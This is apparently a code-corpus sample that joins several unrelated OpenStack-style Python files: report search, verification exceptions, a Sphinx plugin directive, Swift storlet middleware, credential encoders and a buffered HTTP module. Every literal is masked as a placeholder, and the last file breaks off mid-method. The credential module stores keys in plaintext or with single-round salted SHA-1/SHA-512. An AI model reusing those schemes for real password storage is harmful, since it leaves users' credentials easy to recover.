                              "<STR_LIT>" % field)


class BadRequestException(Exception):
    # Raised by the report-search parsers below; converted to an error
    # response in do_jsonreports_search.
    pass


# Parse a 'created' query value into a decimal timestamp; a malformed
# value becomes a BadRequestException (client error, not a 500).
def _parse_created(created):
    try:
        created_datetime = datetime.datetime.strptime(created, '<STR_LIT>')
        return dt.dt_to_decimal(created_datetime)
    except ValueError:
        raise BadRequestException(
            "<STR_LIT>"
            % created)


def _parse_id(id):
    try:
        return int(id)
    except ValueError:
        raise BadRequestException(
            "<STR_LIT>"
            "<STR_LIT>" % id)


# Translate user-facing search fields into ORM filter kwargs.  A
# 'created' value expands into a one-day [created, created+day) window.
def _parse_fields_and_create_query_filters(request_filters):
    query_filters = {}
    for field, value in request_filters.iteritems():
        if field == '<STR_LIT>':
            decimal_created = _parse_created(value)
            query_filters['<STR_LIT>'] = decimal_created
            query_filters['<STR_LIT>'] = decimal_created + SECS_PER_DAY
        elif field == '<STR_LIT:id>':
            id = _parse_id(value)
            query_filters['<STR_LIT>'] = id
        else:
            query_filters[field + '<STR_LIT>'] = value
    return query_filters


# Reject any search field outside the whitelist with a client error.
def _check_if_fields_searchable(request_filters):
    allowed_fields = ['<STR_LIT:id>', '<STR_LIT:name>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>']
    invalid_fields = [field for field in request_filters.keys()
                      if field not in allowed_fields]
    if invalid_fields:
        raise BadRequestException(
            "<STR_LIT>"
            "<STR_LIT>"
            "<STR_LIT>" %
            '<STR_LIT:U+002CU+0020>'.join(sorted(invalid_fields)))


# Copy the GET params, strip pagination keys, validate the rest, and
# build ORM filters from them.
def _create_query_filters(request):
    request_filters = deepcopy(request.GET)
    request_filters.pop('<STR_LIT>', None)
    request_filters.pop('<STR_LIT>', None)
    _check_if_fields_searchable(request_filters)
    return _parse_fields_and_create_query_filters(request_filters)


# Search stored JSON reports; parse/validation failures map to client
# error responses rather than propagating.
def do_jsonreports_search(request):
    try:
        model = models.JsonReport
        filters = _create_query_filters(request)
        reports = model_search(request, model.objects, filters,
                               order_by='<STR_LIT>')
        results = [['<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT:Name>', '<STR_LIT>']]
        for report in reports:
            results.append([report.id,
                            datetime.datetime.strftime(
                                report.period_start, UTC_FORMAT),
                            datetime.datetime.strftime(
                                report.period_end, UTC_FORMAT),
                            datetime.datetime.strftime(
                                dt.dt_from_decimal(report.created),
                                UTC_FORMAT),
                            report.name,
                            report.version])
    except BadRequestException as be:
        return error_response(<NUM_LIT>, '<STR_LIT>', str(be))
    except ValidationError as ve:
        return error_response(<NUM_LIT>, '<STR_LIT>', ve.messages[<NUM_LIT:0>])
    return rsp(json.dumps(results)) </s>
<s> import datetime


# Exception hierarchy for verification failures.  Every subclass sets
# self.reason (the human-readable message returned by __str__).
# NOTE(review): subclasses assign self.reason directly instead of
# calling VerificationException.__init__, so Exception.args stays empty
# for them.  All string literals are corpus placeholders.
class VerificationException(Exception):
    def __init__(self, reason):
        # reason: human-readable description of the failure.
        self.reason = reason

    def __str__(self):
        return self.reason


class NotFound(VerificationException):
    # Lookup for `object_type` with `search_params` matched nothing.
    def __init__(self, object_type, search_params):
        self.object_type = object_type
        self.search_params = search_params
        self.reason = "<STR_LIT>" % (self.object_type,
                                     self.search_params)


class AmbiguousResults(VerificationException):
    # Lookup for `object_type` with `search_params` matched more than
    # one row.
    def __init__(self, object_type, search_params):
        self.object_type = object_type
        self.search_params = search_params
        msg = "<STR_LIT>" % (self.object_type,
                             self.search_params)
        self.reason = msg


class FieldMismatch(VerificationException):
    # Two entities disagree on `field_name` for instance `uuid`; each
    # entity is a dict with 'name' and 'value' keys used in the message.
    def __init__(self, field_name, entity_1, entity_2, uuid):
        self.field_name = field_name
        self.entity_1 = entity_1
        self.entity_2 = entity_2
        self.uuid = uuid
        # Adjacent placeholder literals are an implicitly-concatenated
        # format string; failed_at timestamps the check itself.
        self.reason = "<STR_LIT>" "<STR_LIT>" "<STR_LIT>".format(
            failed_at=datetime.datetime.utcnow(), uuid=self.uuid,
            field_name=self.field_name, name_1=entity_1['<STR_LIT:name>'],
            value_1=self.entity_1['<STR_LIT:value>'],
            name_2=self.entity_2['<STR_LIT:name>'],
            value_2=self.entity_2['<STR_LIT:value>'])


class NullFieldException(VerificationException):
    # `field_name` was unexpectedly null on exists row `exist_id`.
    def __init__(self, field_name, exist_id, uuid):
        self.field_name = field_name
        self.reason = "<STR_LIT>" "<STR_LIT>".format(
            failed_at=datetime.datetime.utcnow(), uuid=uuid,
            field_name=field_name, exist_id=exist_id)


class WrongTypeException(VerificationException):
    # `field_name` on exists row `exist_id` held `value` of an
    # unexpected type.
    def __init__(self, field_name, value, exist_id, uuid):
        self.field_name = field_name
        self.value = value
        self.exist_id = exist_id
        self.uuid = uuid
        self.reason = "<STR_LIT>" "<STR_LIT>" "<STR_LIT>".format(
            failed_at=datetime.datetime.utcnow(), uuid=self.uuid,
            field_name=self.field_name, value=self.value,
            exist_id=self.exist_id) </s>
"""Sphinx extension that documents plugins registered via stevedore."""
from __future__ import unicode_literals

import inspect

from docutils import nodes
from docutils.parsers import rst
from docutils.parsers.rst import directives
from docutils.statemachine import ViewList
from sphinx.util.nodes import nested_parse_with_titles
from stevedore import extension


def _get_docstring(plugin):
    # inspect.getdoc() returns None for undocumented plugins; fall back to
    # the default string so callers always receive text.
    return inspect.getdoc(plugin) or '<STR_LIT>'


def _simple_list(mgr):
    """Yield (text, source-module) pairs: one summary line per extension."""
    for name in sorted(mgr.names()):
        ext = mgr[name]
        doc = _get_docstring(ext.plugin) or '<STR_LIT:\n>'
        # Only the first docstring line is used as the summary.
        summary = doc.splitlines()[<NUM_LIT:0>].strip()
        yield ('<STR_LIT>' % (ext.name, summary),
               ext.entry_point.module_name)


def _detailed_list(mgr, over='<STR_LIT>', under='<STR_LIT:->', titlecase=False):
    """Yield (text, source-module) pairs forming a titled section per extension.

    Each section is: optional overline, title (optionally title-cased),
    optional underline, blank line, then the plugin's full docstring.
    """
    for name in sorted(mgr.names()):
        ext = mgr[name]
        if over:
            yield (over * len(ext.name), ext.entry_point.module_name)
        if titlecase:
            yield (ext.name.title(), ext.entry_point.module_name)
        else:
            yield (ext.name, ext.entry_point.module_name)
        if under:
            yield (under * len(ext.name), ext.entry_point.module_name)
        yield ('<STR_LIT:\n>', ext.entry_point.module_name)
        doc = _get_docstring(ext.plugin)
        if doc:
            yield (doc, ext.entry_point.module_name)
        else:
            # No docstring at all: emit a placeholder naming the entry point.
            yield ('<STR_LIT>'
                   % ext.entry_point,
                   ext.entry_point.module_name)
        yield ('<STR_LIT:\n>', ext.entry_point.module_name)


class ListPluginsDirective(rst.Directive):
    """reST directive that lists the plugins found in a given namespace."""

    option_spec = {
        '<STR_LIT:class>': directives.class_option,
        '<STR_LIT>': directives.flag,
        '<STR_LIT>': directives.flag,
        '<STR_LIT>': directives.single_char_or_unicode,
        '<STR_LIT>': directives.single_char_or_unicode,
    }

    has_content = True

    def run(self):
        env = self.state.document.settings.env
        app = env.app
        # The directive body holds the entry-point namespace to scan.
        namespace = '<STR_LIT:U+0020>'.join(self.content).strip()
        app.info('<STR_LIT>' % namespace)
        overline_style = self.options.get('<STR_LIT>', '<STR_LIT>')
        underline_style = self.options.get('<STR_LIT>', '<STR_LIT:=>')

        def report_load_failure(mgr, ep, err):
            # Warn, but do not abort the docs build, when a plugin fails
            # to load.
            app.warn(u'<STR_LIT>' % (ep.module_name, err))

        mgr = extension.ExtensionManager(
            namespace,
            on_load_failure_callback=report_load_failure,
        )
        result = ViewList()
        titlecase = '<STR_LIT>' in self.options
        if '<STR_LIT>' in self.options:
            data = _detailed_list(
                mgr, over=overline_style, under=underline_style,
                titlecase=titlecase)
        else:
            data = _simple_list(mgr)
        for text, source in data:
            for line in text.splitlines():
                result.append(line, source)
        # Parse the generated reST into a temporary section node and return
        # its children so headings nest correctly in the host document.
        node = nodes.section()
        node.document = self.state.document
        nested_parse_with_titles(self.state, result, node)
        return node.children


def setup(app):
    """Sphinx extension entry point: register the directive."""
    app.info('<STR_LIT>')
    app.add_directive('<STR_LIT>', ListPluginsDirective)
<s> """<STR_LIT>""" <EOL> import ConfigParser <EOL> import urllib <EOL> from eventlet import Timeout <EOL> from six . moves . urllib . parse import quote <EOL> from swift . common . constraints import check_copy_from_header , check_destination_header <EOL> from swift . common . swob import HTTPException , Response , HTTPBadRequest , HTTPMethodNotAllowed , HTTPPreconditionFailed , HTTPRequestedRangeNotSatisfiable , HTTPInternalServerError , wsgify <EOL> from swift . common . utils import config_true_value , get_logger , is_success , register_swift_info <EOL> from swift . proxy . controllers . base import get_account_info <EOL> from storlet_middleware . storlet_common import StorletRuntimeException , StorletTimeout <EOL> class NotStorletRequest ( Exception ) : <EOL> pass <EOL> class NotStorletExecution ( NotStorletRequest ) : <EOL> pass <EOL> def _request_instance_property ( ) : <EOL> """<STR_LIT>""" <EOL> def getter ( self ) : <EOL> return self . _request <EOL> def setter ( self , request ) : <EOL> self . _request = request <EOL> try : <EOL> self . _extract_vaco ( ) <EOL> except ValueError : <EOL> raise NotStorletRequest ( ) <EOL> return property ( getter , setter , <EOL> doc = "<STR_LIT>" ) <EOL> class BaseStorletHandler ( object ) : <EOL> """<STR_LIT>""" <EOL> request = _request_instance_property ( ) <EOL> def __init__ ( self , request , conf , app , logger ) : <EOL> """<STR_LIT>""" <EOL> self . request = request <EOL> self . app = app <EOL> self . logger = logger <EOL> self . conf = conf <EOL> self . gateway_class = self . conf [ '<STR_LIT>' ] <EOL> def _setup_gateway ( self ) : <EOL> """<STR_LIT>""" <EOL> self . gateway = self . gateway_class ( <EOL> self . conf , self . logger , self . app , self . api_version , <EOL> self . account , self . container , self . obj ) <EOL> self . _update_storlet_parameters_from_headers ( ) <EOL> def _extract_vaco ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _api_version , self . _account , self . _container , self . 
_obj = self . _parse_vaco ( ) <EOL> @ property <EOL> def api_version ( self ) : <EOL> return self . _api_version <EOL> @ property <EOL> def account ( self ) : <EOL> return self . _account <EOL> @ property <EOL> def container ( self ) : <EOL> return self . _container <EOL> @ property <EOL> def obj ( self ) : <EOL> return self . _obj <EOL> def _parse_vaco ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def handle_request ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> @ property <EOL> def is_storlet_execution ( self ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' in self . request . headers <EOL> @ property <EOL> def is_range_request ( self ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' in self . request . headers <EOL> @ property <EOL> def is_storlet_range_request ( self ) : <EOL> return '<STR_LIT>' in self . request . headers <EOL> def is_slo_response ( self , resp ) : <EOL> """<STR_LIT>""" <EOL> self . logger . debug ( <EOL> '<STR_LIT>' . format ( <EOL> self . account , self . container , self . obj ) ) <EOL> is_slo = '<STR_LIT>' in resp . headers <EOL> if is_slo : <EOL> self . logger . debug ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT:object>' . format ( self . account , self . container , self . obj ) ) <EOL> else : <EOL> self . logger . debug ( <EOL> '<STR_LIT>' . format ( <EOL> self . account , self . container , self . obj ) ) <EOL> return is_slo <EOL> def _update_storlet_parameters_from_headers ( self ) : <EOL> """<STR_LIT>""" <EOL> parameters = { } <EOL> for param in self . request . headers : <EOL> if param . lower ( ) . startswith ( '<STR_LIT>' ) : <EOL> keyvalue = self . request . headers [ param ] <EOL> keyvalue = urllib . unquote ( keyvalue ) <EOL> [ key , value ] = keyvalue . split ( '<STR_LIT::>' ) <EOL> parameters [ key ] = value <EOL> self . request . params . 
update ( parameters ) <EOL> def _call_gateway ( self , resp ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def apply_storlet ( self , resp ) : <EOL> """<STR_LIT>""" <EOL> outmd , app_iter = self . _call_gateway ( resp ) <EOL> new_headers = resp . headers . copy ( ) <EOL> if '<STR_LIT>' in new_headers : <EOL> new_headers . pop ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' in new_headers : <EOL> new_headers . pop ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' in resp . headers : <EOL> new_headers [ '<STR_LIT>' ] = resp . headers [ '<STR_LIT>' ] <EOL> new_headers . pop ( '<STR_LIT>' ) <EOL> return Response ( headers = new_headers , app_iter = app_iter , <EOL> reuqest = self . request ) <EOL> class StorletProxyHandler ( BaseStorletHandler ) : <EOL> def __init__ ( self , request , conf , app , logger ) : <EOL> super ( StorletProxyHandler , self ) . __init__ ( <EOL> request , conf , app , logger ) <EOL> self . storlet_container = conf . get ( '<STR_LIT>' ) <EOL> self . storlet_dependency = conf . get ( '<STR_LIT>' ) <EOL> self . storlet_containers = [ self . storlet_container , <EOL> self . storlet_dependency ] <EOL> if not self . is_storlet_request : <EOL> raise NotStorletRequest ( ) <EOL> account_meta = get_account_info ( self . request . environ , <EOL> self . app ) [ '<STR_LIT>' ] <EOL> storlets_enabled = account_meta . get ( '<STR_LIT>' , <EOL> '<STR_LIT:False>' ) <EOL> if not config_true_value ( storlets_enabled ) : <EOL> self . logger . debug ( '<STR_LIT>' ) <EOL> raise HTTPBadRequest ( '<STR_LIT>' , <EOL> request = self . request ) <EOL> if self . is_storlet_object_update : <EOL> self . _validate_registration ( self . request ) <EOL> raise NotStorletExecution ( ) <EOL> else : <EOL> self . _setup_gateway ( ) <EOL> def _parse_vaco ( self ) : <EOL> return self . request . split_path ( <NUM_LIT:4> , <NUM_LIT:4> , rest_with_last = True ) <EOL> def is_proxy_runnable ( self , resp ) : <EOL> """<STR_LIT>""" <EOL> runnable = any ( <EOL> [ self . 
is_storlet_range_request , self . is_slo_response ( resp ) , <EOL> self . conf [ '<STR_LIT>' ] ] ) <EOL> return runnable <EOL> @ property <EOL> def is_storlet_request ( self ) : <EOL> return self . is_storlet_execution or self . is_storlet_object_update <EOL> @ property <EOL> def is_storlet_object_update ( self ) : <EOL> return ( self . container in self . storlet_containers and self . obj <EOL> and self . request . method in [ '<STR_LIT>' , '<STR_LIT:POST>' ] ) <EOL> @ property <EOL> def is_put_copy_request ( self ) : <EOL> return '<STR_LIT>' in self . request . headers <EOL> def _parse_storlet_params ( self , headers ) : <EOL> params = dict ( ) <EOL> for key in headers : <EOL> if key . startswith ( '<STR_LIT>' ) : <EOL> params [ key [ len ( '<STR_LIT>' ) : ] ] = headers [ key ] <EOL> return params <EOL> def _validate_registration ( self , req ) : <EOL> params = self . _parse_storlet_params ( req . headers ) <EOL> try : <EOL> if self . container == self . storlet_container : <EOL> self . logger . debug ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . gateway_class . validate_storlet_registration ( <EOL> params , self . obj ) <EOL> else : <EOL> self . logger . debug ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . gateway_class . validate_dependency_registration ( <EOL> params , self . obj ) <EOL> except ValueError as e : <EOL> self . logger . exception ( '<STR_LIT>' ) <EOL> raise HTTPBadRequest ( e . message ) <EOL> def handle_request ( self ) : <EOL> if hasattr ( self , self . request . method ) : <EOL> resp = getattr ( self , self . request . method ) ( ) <EOL> return resp <EOL> else : <EOL> raise HTTPMethodNotAllowed ( req = self . request ) <EOL> def _call_gateway ( self , resp ) : <EOL> return self . gateway . gatewayProxyGetFlow ( <EOL> self . request , self . container , self . obj , resp ) <EOL> def GET ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . is_range_request : <EOL> raise HTTPBadRequest ( '<STR_LIT>' <EOL> '<STR_LIT>' , request = self . 
request ) <EOL> self . gateway . authorizeStorletExecution ( self . request ) <EOL> self . gateway . augmentStorletRequest ( self . request ) <EOL> if self . is_storlet_range_request : <EOL> self . request . headers [ '<STR_LIT>' ] = self . request . headers [ '<STR_LIT>' ] <EOL> original_resp = self . request . get_response ( self . app ) <EOL> if original_resp . is_success : <EOL> if self . is_proxy_runnable ( original_resp ) : <EOL> return self . apply_storlet ( original_resp ) <EOL> else : <EOL> if '<STR_LIT>' in original_resp . headers : <EOL> original_resp . headers . pop ( '<STR_LIT>' ) <EOL> original_resp . headers [ '<STR_LIT>' ] = None <EOL> return original_resp <EOL> else : <EOL> return original_resp <EOL> def _validate_copy_request ( self ) : <EOL> unsupported_headers = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> for header in unsupported_headers : <EOL> if self . request . headers . get ( header ) : <EOL> raise HTTPBadRequest ( <EOL> '<STR_LIT>' % <EOL> header ) <EOL> def handle_put_copy_response ( self , out_md , app_iter ) : <EOL> self . request . environ [ '<STR_LIT>' ] = app_iter <EOL> if '<STR_LIT>' in self . request . environ : <EOL> self . request . environ . pop ( '<STR_LIT>' ) <EOL> self . request . headers [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> return self . request . get_response ( self . app ) <EOL> def base_handle_copy_request ( self , src_container , src_obj , <EOL> dest_container , dest_object ) : <EOL> """<STR_LIT>""" <EOL> source_path = '<STR_LIT>' % ( self . api_version , self . account , <EOL> src_container , src_obj ) <EOL> source_req = self . request . copy_get ( ) <EOL> source_req . headers . pop ( '<STR_LIT>' , None ) <EOL> source_req . headers . pop ( '<STR_LIT>' , None ) <EOL> source_req . path_info = source_path <EOL> source_req . headers [ '<STR_LIT>' ] = '<STR_LIT:true>' <EOL> source_resp = source_req . get_response ( self . app ) <EOL> ( out_md , app_iter ) = self . gateway . gatewayProxyCopyFlow ( self . 
request , <EOL> dest_container , <EOL> dest_object , <EOL> source_resp ) <EOL> resp = self . handle_put_copy_response ( out_md , app_iter ) <EOL> acct , path = source_resp . environ [ '<STR_LIT>' ] . split ( '<STR_LIT:/>' , <NUM_LIT:3> ) [ <NUM_LIT:2> : <NUM_LIT:4> ] <EOL> resp . headers [ '<STR_LIT>' ] = quote ( acct ) <EOL> resp . headers [ '<STR_LIT>' ] = quote ( path ) <EOL> if '<STR_LIT>' in source_resp . headers : <EOL> resp . headers [ '<STR_LIT>' ] = source_resp . headers [ '<STR_LIT>' ] <EOL> return resp <EOL> def PUT ( self ) : <EOL> """<STR_LIT>""" <EOL> self . gateway . authorizeStorletExecution ( self . request ) <EOL> self . gateway . augmentStorletRequest ( self . request ) <EOL> if self . is_put_copy_request : <EOL> self . _validate_copy_request ( ) <EOL> src_container , src_obj = check_copy_from_header ( self . request ) <EOL> dest_container = self . container <EOL> dest_object = self . obj <EOL> self . request . headers . pop ( '<STR_LIT>' , None ) <EOL> return self . base_handle_copy_request ( src_container , src_obj , <EOL> dest_container , dest_object ) <EOL> ( out_md , app_iter ) = self . gateway . gatewayProxyPutFlow ( self . request , <EOL> self . container , self . obj ) <EOL> return self . handle_put_copy_response ( out_md , app_iter ) <EOL> def COPY ( self ) : <EOL> """<STR_LIT>""" <EOL> if not self . request . headers . get ( '<STR_LIT>' ) : <EOL> return HTTPPreconditionFailed ( request = self . request , <EOL> body = '<STR_LIT>' ) <EOL> self . gateway . authorizeStorletExecution ( self . request ) <EOL> self . gateway . augmentStorletRequest ( self . request ) <EOL> self . _validate_copy_request ( ) <EOL> dest_container , dest_object = check_destination_header ( self . request ) <EOL> self . request . method = '<STR_LIT>' <EOL> self . request . path_info = '<STR_LIT>' % ( self . account , dest_container , dest_object ) <EOL> self . request . headers [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> del self . request . 
headers [ '<STR_LIT>' ] <EOL> return self . base_handle_copy_request ( self . container , self . obj , <EOL> dest_container , dest_object ) <EOL> class StorletObjectHandler ( BaseStorletHandler ) : <EOL> def __init__ ( self , request , conf , app , logger ) : <EOL> super ( StorletObjectHandler , self ) . __init__ ( <EOL> request , conf , app , logger ) <EOL> if ( self . is_storlet_execution ) : <EOL> self . _setup_gateway ( ) <EOL> else : <EOL> raise NotStorletRequest ( ) <EOL> def _parse_vaco ( self ) : <EOL> _ , _ , acc , cont , obj = self . request . split_path ( <EOL> <NUM_LIT:5> , <NUM_LIT:5> , rest_with_last = True ) <EOL> return ( '<STR_LIT:0>' , acc , cont , obj ) <EOL> @ property <EOL> def is_slo_get_request ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . request . params . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> def handle_request ( self ) : <EOL> if hasattr ( self , self . request . method ) : <EOL> return getattr ( self , self . request . method ) ( ) <EOL> else : <EOL> raise HTTPMethodNotAllowed ( request = self . request ) <EOL> def _call_gateway ( self , resp ) : <EOL> return self . gateway . gatewayObjectGetFlow ( <EOL> self . request , self . container , self . obj , resp ) <EOL> def GET ( self ) : <EOL> """<STR_LIT>""" <EOL> self . logger . debug ( '<STR_LIT>' ) <EOL> if self . is_range_request and not self . is_storlet_range_request : <EOL> raise HTTPRequestedRangeNotSatisfiable ( <EOL> '<STR_LIT>' , <EOL> request = self . request ) <EOL> orig_resp = self . request . get_response ( self . app ) <EOL> if not is_success ( orig_resp . status_int ) : <EOL> return orig_resp <EOL> not_runnable = any ( <EOL> [ self . is_storlet_range_request , self . is_slo_get_request , <EOL> self . conf [ '<STR_LIT>' ] , <EOL> self . is_slo_response ( orig_resp ) ] ) <EOL> if not_runnable : <EOL> self . logger . debug ( '<STR_LIT>' <EOL> '<STR_LIT>' % <EOL> ( self . account , self . container , self . 
obj , <EOL> '<STR_LIT>' ) ) <EOL> return orig_resp <EOL> else : <EOL> self . logger . debug ( '<STR_LIT>' <EOL> '<STR_LIT>' % <EOL> ( self . account , self . container , self . obj , <EOL> '<STR_LIT>' ) ) <EOL> return self . apply_storlet ( orig_resp ) <EOL> class StorletHandlerMiddleware ( object ) : <EOL> def __init__ ( self , app , conf , storlet_conf ) : <EOL> self . app = app <EOL> self . logger = get_logger ( conf , log_route = '<STR_LIT>' ) <EOL> self . stimeout = int ( storlet_conf . get ( '<STR_LIT>' ) ) <EOL> self . storlet_containers = [ storlet_conf . get ( '<STR_LIT>' ) , <EOL> storlet_conf . get ( '<STR_LIT>' ) ] <EOL> self . exec_server = storlet_conf . get ( '<STR_LIT>' ) <EOL> self . handler_class = self . _get_handler ( self . exec_server ) <EOL> self . gateway_module = storlet_conf [ '<STR_LIT>' ] <EOL> self . proxy_only_storlet_execution = storlet_conf [ '<STR_LIT>' ] <EOL> self . gateway_conf = storlet_conf <EOL> def _get_handler ( self , exec_server ) : <EOL> """<STR_LIT>""" <EOL> if exec_server == '<STR_LIT>' : <EOL> return StorletProxyHandler <EOL> elif exec_server == '<STR_LIT:object>' : <EOL> return StorletObjectHandler <EOL> else : <EOL> raise ValueError ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % exec_server ) <EOL> @ wsgify <EOL> def __call__ ( self , req ) : <EOL> try : <EOL> request_handler = self . handler_class ( <EOL> req , self . gateway_conf , self . app , self . logger ) <EOL> self . logger . debug ( '<STR_LIT>' % <EOL> ( self . exec_server , request_handler . account , <EOL> request_handler . container , request_handler . obj ) ) <EOL> except HTTPException : <EOL> raise <EOL> except NotStorletRequest : <EOL> return req . get_response ( self . app ) <EOL> try : <EOL> return request_handler . handle_request ( ) <EOL> except StorletTimeout : <EOL> self . logger . exception ( '<STR_LIT>' ) <EOL> raise HTTPInternalServerError ( body = '<STR_LIT>' ) <EOL> except StorletRuntimeException : <EOL> self . logger . 
exception ( '<STR_LIT>' ) <EOL> raise HTTPInternalServerError ( body = '<STR_LIT>' ) <EOL> except Timeout : <EOL> self . logger . exception ( '<STR_LIT>' ) <EOL> raise HTTPInternalServerError ( body = '<STR_LIT>' ) <EOL> except HTTPException : <EOL> self . logger . exception ( '<STR_LIT>' ) <EOL> raise <EOL> except Exception : <EOL> self . logger . exception ( '<STR_LIT>' ) <EOL> raise HTTPInternalServerError ( body = '<STR_LIT>' ) <EOL> def filter_factory ( global_conf , ** local_conf ) : <EOL> conf = global_conf . copy ( ) <EOL> conf . update ( local_conf ) <EOL> storlet_conf = dict ( ) <EOL> storlet_conf [ '<STR_LIT>' ] = conf . get ( '<STR_LIT>' , <NUM_LIT> ) <EOL> storlet_conf [ '<STR_LIT>' ] = conf . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> storlet_conf [ '<STR_LIT>' ] = conf . get ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> storlet_conf [ '<STR_LIT>' ] = conf . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> storlet_conf [ '<STR_LIT>' ] = config_true_value ( conf . get ( '<STR_LIT>' , '<STR_LIT:false>' ) ) <EOL> storlet_conf [ '<STR_LIT>' ] = { } <EOL> storlet_conf [ '<STR_LIT>' ] = conf . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> module_name = conf . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> mo = module_name [ : module_name . rfind ( '<STR_LIT::>' ) ] <EOL> cl = module_name [ module_name . rfind ( '<STR_LIT::>' ) + <NUM_LIT:1> : ] <EOL> module = __import__ ( mo , fromlist = [ cl ] ) <EOL> the_class = getattr ( module , cl ) <EOL> configParser = ConfigParser . RawConfigParser ( ) <EOL> configParser . read ( conf . get ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) ) <EOL> additional_items = configParser . items ( "<STR_LIT>" ) <EOL> for key , val in additional_items : <EOL> storlet_conf [ key ] = val <EOL> swift_info = { } <EOL> storlet_conf [ "<STR_LIT>" ] = the_class <EOL> register_swift_info ( '<STR_LIT>' , False , ** swift_info ) <EOL> def storlet_handler_filter ( app ) : <EOL> return StorletHandlerMiddleware ( app , conf , storlet_conf ) <EOL> return storlet_handler_filter </s>
"""Credential encoding/matching schemes: plaintext and salted SHA-1/SHA-512."""
import hashlib
import os

# Upper bound on token length (value masked in this corpus).
MAX_TOKEN_LENGTH = <NUM_LIT>


class Plaintext(object):
    """Stores the key as-is behind a scheme prefix; no hashing."""

    def encode(self, key):
        """Return the key wrapped in the plaintext credential format."""
        return "<STR_LIT>" % key

    def match(self, key, creds):
        """True if encoding the key reproduces the stored credentials."""
        return self.encode(key) == creds


class Sha1(object):
    """Salted SHA-1 credential scheme."""

    def encode_w_salt(self, salt, key):
        """Hash salt+key with SHA-1 and return scheme-prefixed salt$hash text."""
        enc_key = '<STR_LIT>' % (salt, key)
        enc_val = hashlib.sha1(enc_key).hexdigest()
        return "<STR_LIT>" % (salt, enc_val)

    def encode(self, key):
        """Encode key with the configured salt, else a fresh random one.

        NOTE(review): ``self.salt`` is never assigned in this class;
        presumably the auth middleware sets it from configuration before
        calling encode() — confirm, else this raises AttributeError.
        """
        salt = self.salt or os.urandom(<NUM_LIT:32>).encode('<STR_LIT>').rstrip()
        return self.encode_w_salt(salt, key)

    def match(self, key, creds):
        """Re-encode key with the salt stored in creds and compare."""
        # NOTE(review): 'type' shadows the builtin; it is unused past the
        # unpack, so behavior is unaffected.
        type, rest = creds.split('<STR_LIT::>')
        salt, enc = rest.split('<STR_LIT:$>')
        return self.encode_w_salt(salt, key) == creds


class Sha512(object):
    """Salted SHA-512 credential scheme (same layout as Sha1)."""

    def encode_w_salt(self, salt, key):
        """Hash salt+key with SHA-512 and return scheme-prefixed salt$hash text."""
        enc_key = '<STR_LIT>' % (salt, key)
        enc_val = hashlib.sha512(enc_key).hexdigest()
        return "<STR_LIT>" % (salt, enc_val)

    def encode(self, key):
        """Encode key with the configured salt, else a fresh random one.

        NOTE(review): ``self.salt`` is never assigned here either — confirm
        the middleware injects it before use.
        """
        salt = self.salt or os.urandom(<NUM_LIT:32>).encode('<STR_LIT>').rstrip()
        return self.encode_w_salt(salt, key)

    def match(self, key, creds):
        """Re-encode key with the salt stored in creds and compare."""
        type, rest = creds.split('<STR_LIT::>')
        salt, enc = rest.split('<STR_LIT:$>')
        return self.encode_w_salt(salt, key) == creds
"""Eventlet-friendly httplib wrappers with buffered, readline-capable responses."""
from swift import gettext_ as _
from swift.common import constraints
import logging
import time
import socket
import eventlet
from eventlet.green.httplib import CONTINUE, HTTPConnection, HTTPMessage, HTTPResponse, HTTPSConnection, _UNKNOWN
from six.moves.urllib.parse import quote
import six

httplib = eventlet.import_patched('<STR_LIT>')
# Cap header count with Swift's constraint instead of httplib's default.
httplib._MAXHEADERS = constraints.MAX_HEADER_COUNT


class BufferedHTTPResponse(HTTPResponse):
    """HTTPResponse with a readline buffer and hard-socket teardown support."""

    def __init__(self, sock, debuglevel=<NUM_LIT:0>, strict=<NUM_LIT:0>,
                 method=None):
        self.sock = sock
        # Keep the real (non-green) socket so nuke_from_orbit() can close
        # it out from under eventlet.
        self._real_socket = sock.fd._sock
        self.fp = sock.makefile('<STR_LIT:rb>')
        self.debuglevel = debuglevel
        self.strict = strict
        self._method = method
        self.msg = None
        # Response state starts unknown until begin()/expect_response().
        self.version = _UNKNOWN
        self.status = _UNKNOWN
        self.reason = _UNKNOWN
        self.chunked = _UNKNOWN
        self.chunk_left = _UNKNOWN
        self.length = _UNKNOWN
        self.will_close = _UNKNOWN
        # Data read past a newline by readline(), awaiting the next read.
        self._readline_buffer = '<STR_LIT>'

    def expect_response(self):
        """Read the status line of a 100-continue exchange.

        If the server did not send 100 Continue, replay the status line
        through the normal begin() machinery instead.
        """
        if self.fp:
            self.fp.close()
            self.fp = None
        self.fp = self.sock.makefile('<STR_LIT:rb>', <NUM_LIT:0>)
        version, status, reason = self._read_status()
        if status != CONTINUE:
            # Make begin() see the status line we already consumed.
            self._read_status = lambda: (version, status, reason)
            self.begin()
        else:
            self.status = status
            self.reason = reason.strip()
            self.version = <NUM_LIT:11>
            self.msg = HTTPMessage(self.fp, <NUM_LIT:0>)
            self.msg.fp = None

    def read(self, amt=None):
        """Read, draining any data readline() buffered first."""
        if not self._readline_buffer:
